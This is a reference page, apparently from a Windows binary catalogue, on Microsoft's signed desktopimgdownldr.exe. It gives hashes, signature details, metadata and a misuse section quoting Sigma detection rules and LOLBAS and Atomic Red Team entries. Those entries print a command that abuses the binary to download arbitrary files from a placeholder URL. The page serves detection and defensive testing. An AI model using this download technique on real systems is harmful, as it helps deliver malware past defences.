desktopimgdownldr.exe

  • File Path: C:\Windows\system32\desktopimgdownldr.exe
  • Description: desktopimgdownldr.exe

Hashes

  • MD5: AECDFE9512F9ABF601B5B439FAA2B64A
  • SHA1: DD4E992C75E791094449FD52F646233C9AD06654
  • SHA256: 1F336FA7255266CA76D26928DA7A2E0D4446F4CAE7F2041218BB2B166A97504D
  • SHA384: 0607C22104D22394E41CCE21C6720AC85C5174926866B62FA4FF73FBD06704628BDF9EF52D71DDE6A44DE5A1C1931C49
  • SHA512: 8DB2B94D74817B4B2B59B95CC7FEB9963CDCA372A8144634DFBB9258261B5AD6024B4BF37B48C73C51CEA417585FEFC1F45ED5080F4292AADEB7B6FC5878BCFB
  • SSDEEP: 1536:OarCi80YW9i3P9fS+4mh1yUUt1Thu3SkJXDuMOI14uDLRS4Xe6KXQXQX+:nmYQhIt183SkJTuxuDdSkKAXb
  • IMP: 4497ED51F6847EDEE6F31E6DE69B6378
  • PESHA1: 0A683F53F11ED02115F415709AA60D2387EF9B0E
  • PE256: 3E3017729AE251D02AEE1DE4F0571C297BD06231A74A9CB4EFD45AA6EC62F1EF

Runtime Data

Loaded Modules:

  • C:\Windows\system32\desktopimgdownldr.exe
  • C:\Windows\System32\KERNEL32.DLL
  • C:\Windows\System32\KERNELBASE.dll
  • C:\Windows\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: desktopimgdownldr.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/74
  • VirusTotal Link: https://www.virustotal.com/gui/file/1f336fa7255266ca76d26928da7a2e0d4446f4cae7f2041218bb2b166a97504d/detection

Possible Misuse

The following entries are possible examples of desktopimgdownldr.exe being misused. While desktopimgdownldr.exe is not inherently malicious, its legitimate functionality (downloading a lock-screen image from a URL) can be abused to fetch arbitrary files, which is why detection rules key on the output location and file type rather than on the binary itself.

  • Source: sigma — File: file_event_win_susp_desktopimgdownldr_file.yml — License: DRL 1.0
      title: Suspicious Desktopimgdownldr Target File
      description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
  • Source: sigma — File: proc_creation_win_susp_copy_system32.yml — License: DRL 1.0
      description: Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name
  • Source: sigma — File: proc_creation_win_susp_desktopimgdownldr.yml — License: DRL 1.0
      title: Suspicious Desktopimgdownldr Command
      description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
  • Source: LOLBAS — File: Desktopimgdownldr.yml
      Name: Desktopimgdownldr.exe
      - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
      - Path: c:\windows\system32\desktopimgdownldr.exe
      - IOC: desktopimgdownldr.exe that creates non-image file
  • Source: atomic-red-team — File: index.md — License: MIT License. © 2018 Red Canary
      - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
  • Source: atomic-red-team — File: windows-index.md — License: MIT License. © 2018 Red Canary
      - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
  • Source: atomic-red-team — File: T1197.md — License: MIT License. © 2018 Red Canary
      - Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd)
      ## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd)
      This test simulates using desktopimgdownldr.exe to download a malicious file
      and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
      set “#{download_path}” && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr

MIT License. Copyright (c) 2020-2021 Strontic.